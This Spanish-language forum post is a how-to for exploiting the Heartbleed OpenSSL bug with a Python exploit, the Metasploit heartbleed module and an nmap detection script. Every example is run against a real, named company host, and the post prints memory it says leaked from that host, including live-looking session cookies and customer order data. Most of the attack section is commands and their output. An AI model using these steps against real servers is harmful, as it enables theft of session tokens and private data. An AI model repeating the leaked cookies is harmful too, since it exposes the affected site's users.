"Es el bug mas grande en OpenSSL, capaz de capturar y desencriptar desde los nombres de usuario hasta las contraseñas, entre otra información sensible contenida en la memoria de los servidores."
Pueden saber mas en este [Enlace externo eliminado para invitados] que ANTRAX publicó.
Formas de explotarlo.
1. Exploit:
Unas de las formas de explotarlo es con el exploit: [Enlace externo eliminado para invitados] e interpretarlo con python.
Uso del exploit:
Código: Seleccionar todo
python openssl.py sales.bbuconnect.com --port 443 > output_ssl.txt
cat output_ssl.txtCódigo: Seleccionar todo
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 86
... received message: type = 22, ver = 0302, length = 1394
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:Como podemos ver la página es vulnerable. Arrojandonos muchos datos sensibles.
2. Metasploit:
Como siempre metasploit facilitandonos la vida, para explotarlo usaremos el módulo: openssl_heartbleed.rb --> [Enlace externo eliminado para invitados]
Uso:
Código: Seleccionar todo
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS sales.bbuconnect.com
set RPORT 443
set VERBOSE true
runCódigo: Seleccionar todo
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| http://metasploit.pro |
|______________________________________________________________________________|
=[ metasploit v4.8.0-dev [core:4.8 api:1.0]
+ -- --=[ 1154 exploits - 673 auxiliary - 182 post
+ -- --=[ 310 payloads - 30 encoders - 8 nops
msf auxiliary(openssl_heartbleed) > set RHOSTS sales.bbuconnect.com
RHOSTS => sales.bbuconnect.com
msf auxiliary(openssl_heartbleed) > set RPORT 443
RPORT => 443
msf auxiliary(openssl_heartbleed) > set VERBOSE true
VERBOSE => true
msf auxiliary(openssl_heartbleed) > run
[*] 4.31.139.165:443 - Sending Client Hello...
[*] 4.31.139.165:443 - Sending Heartbeat...
[*] 4.31.139.165:443 - Heartbeat response, checking if there is data leaked...
[+] 4.31.139.165:443 - Heartbeat response with leak
[*] 4.31.139.165:443 - Printable info leaked: @,ED!! ECECFFDCDADFDFDBDIDHEMFECACACAAA FFFDFEEMEEEHECECFHDADADDCACACAAASMB%V\MAILSLOT\BROWSEBBU2055187LTn_@@"|,!t-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://orders.bbuconnect.com/prompt/,DanaInfo=.abcwsvtsw1y1zpM-u-9sSw98,Port=10001+QtyModifierCookie: DSSignInURL=/; DSFirstAccess=1398132759; DSLastAccess=1398132936; DSLaunchURL=2F64616E612F686F6D652F73706163652E676966; DSID=b28e87546e98e6d08303408643f3f270Connection: keep-alivePfuMFau4A|9@6 ding: gzip, deflateHost: sales.bbuconnect.comDNT: 1Connection: Keep-AliveCookie: DSSignInURL=/; DSID=9e6dfea3018fb3ed2cddbe4fb6fcc008; DSFirstAccess=1398132571; DSLastAccess=1398132936h;+IM@M#$mRJH"p]N3uVht7e76fd5e3aa9dfebaca6107ed699f5; DSLastAccess=1398132936?>FA*ate_lvl=0&sticker_id=000&individual_pid=7203001339+000&pso_indicator=N&sun=-&mon=0&tue=0&wed=-&thu=0&fri=0&sat=0&row_total=0&prodId=7203001339+000&prodName=LTLEBTS+BLUEMUFF&grand_total=0&fore_cast=3&suggested_order=6&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7203001340+000&pso_indicator=N&sun=-&mon=0&tue=0&wed=-&thu=0&fri=0&sat=0&row_total=0&prodId=7203001340+000&prodName=LB+CRUMB+CAKE+5P&grand_total=0&fore_cast=1&suggested_order=0&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7203001342+000&pso_indicator=N&sun=-&mon=0&tue=18&wed=-&thu=0&fri=0&sat=0&row_total=18&prodId=7203001342+000&prodName=LTLEBTS+BROWNIES&grand_total=18&fore_cast=5&suggested_order=18&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7203001353+000&pso_indicator=N&sun=-&mon=0&tue=18&wed=-&thu=0&fri=0&sat=0&row_total=18&prodId=7203001353+000&prodName=LTLEBTS+CHOCCPMF&grand_total=18&fore_cast=3&suggested_order=18&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7203002058+052&pso_indicator=N&sun=-&mon=0&tue=0&wed=-&thu=12&fri=0&sat=0&row_total=12&prodId=7203002058+052&prodName=LB+SNDOODLE+MUFF&grand_total=12&fore_cast=4&suggested_order=12&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7203002200+052&pso_indicator=N&sun=-&mon=-&tue=0&wed=-&thu=0&fri=0&sat=0&row_total=0&prodId=7203002200+052&prodName=LB+STWBYOG+MFN5P&grand_total=0&fore_cast=1&suggested_order=0&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=04-21-2014&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7087000908+
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(openssl_heartbleed) >
Para detectar si es vulnerable: --> [Enlace externo eliminado para invitados]
Uso:
Código: Seleccionar todo
nmap -p 443 --script ssl-heartbleed <tarjet>Código: Seleccionar todo
stuxnet@stuxnet:/media/Stuxnet/Pentesting/$ nmap -p 443 --script ssl-heartbleed 4.31.139.165
Starting Nmap 6.46 ( http://nmap.org ) at 2014-04-21 21:19 CST
Nmap scan report for sales.bbuconnect.com (4.31.139.165)
Host is up (0.13s latency).
PORT STATE SERVICE
443/tcp open https
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| Description:
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| http://www.openssl.org/news/secadv_20140407.txt
|_ http://cvedetails.com/cve/2014-0160/
